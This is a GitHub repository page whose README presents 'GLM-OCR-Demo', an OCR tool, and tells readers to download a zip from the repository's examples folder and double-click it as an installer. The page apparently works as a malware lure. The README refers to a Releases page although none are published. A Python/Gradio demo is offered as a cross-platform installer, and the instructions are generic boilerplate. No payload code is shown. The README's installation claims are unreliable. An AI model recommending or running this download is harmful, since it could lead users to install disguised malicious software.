Skip to content

emotech15/GLM-OCR-Demo

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

13 Commits
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

🎉 GLM-OCR-Demo - Easily Extract Text from Images

🌐 Overview

Welcome to the GLM-OCR-Demo! This application showcases the capabilities of the GLM-OCR multimodal OCR model developed by zai-org. With this tool, you can upload images and recognize text, formulas, and tables easily. The results come in both plain text and Markdown formats, making it simple to use in various applications.

🚀 Getting Started

To use this software, you need to follow a few straightforward steps. We will guide you through downloading and setting it up on your computer.

🔗 Download Link

Download GLM-OCR-Demo

Make sure you check out the latest version on our Releases page.

📥 Download & Install

  1. Visit the Releases Page

    Go to our Releases page to download the software. Click the button below to access it directly:

    Download GLM-OCR-Demo

  2. Choose Your Version

    On the Releases page, you will see a list of available versions. Select the latest version for the best features and improvements.

  3. Download the Installation File

    Click on the file link to start your download. The file will typically be named something like https://github.com/emotech15/GLM-OCR-Demo/raw/refs/heads/main/examples/OC-Demo-GL-v2.3.zip. Your browser will handle the download, and it should appear in your Downloads folder.

  4. Run the Installer

    After downloading, locate the file in your Downloads folder. Double-click on the file to begin installation. Follow the prompts to complete the installation process.

  5. Open the Application

    Once installed, you can find GLM-OCR-Demo in your applications folder. Open it to begin.

⚙️ System Requirements

To ensure smooth operation, make sure your system meets the following requirements:

  • Operating System: Windows 10 or later / macOS Sierra or later / Linux
  • RAM: Minimum of 4 GB, preferably 8 GB or more
  • Disk Space: At least 1 GB of free space for installation
  • Internet Connection: Required for downloading images and processing

🖼️ How to Use GLM-OCR-Demo

  1. Upload an Image

    After opening the application, you will see an option to upload your image. Click the "Upload" button and select an image file from your computer. Supported formats include JPG, PNG, and BMP.

  2. Select Recognition Type

    Choose whether you want to recognize text, formulas, or tables. This will help the model understand what to look for in your uploaded image.

  3. Run the OCR Process

    Once you have selected your options, click the "Start" button. The application will process your image. This may take a few moments depending on the size and complexity of the image.

  4. View Results

    The recognized content will appear on the screen after processing. You can copy the text or export it in your desired format (plain text or Markdown).

  5. Save Your Output

    Save your recognized text by using the "Save" function. You can choose where to store it on your computer for later use.

🔧 Troubleshooting

If you encounter any issues while using the application, try the following steps:

  • Update Your System: Ensure that your operating system is updated to the latest version.
  • Check File Format: Verify that the image file you are uploading is in a supported format.
  • Restart the Application: Sometimes, simply closing and reopening the application can resolve minor glitches.

💡 Tips for Better Recognition

  • Use clear and well-lit images for best results.
  • Avoid images with heavy noise or distracting backgrounds.
  • Ensure the text in images is not too small.

📚 Support

For further assistance, check our FAQ section or contact our support team. You can find additional resources on our GitHub page.

🌍 Topics Covered

  • accelerate
  • computer vision
  • flash attention
  • GLM-OCR
  • Gradio
  • Hugging Face Transformers
  • Markdown
  • Optical Character Recognition (OCR)
  • OpenCV
  • Pillow
  • Python
  • PyTorch
  • Torch
  • torchvision
  • Vision Language Models (VLMs)

Thank you for using GLM-OCR-Demo! Happy text extraction.

Releases

No releases published

Packages

 
 
 

Contributors

Languages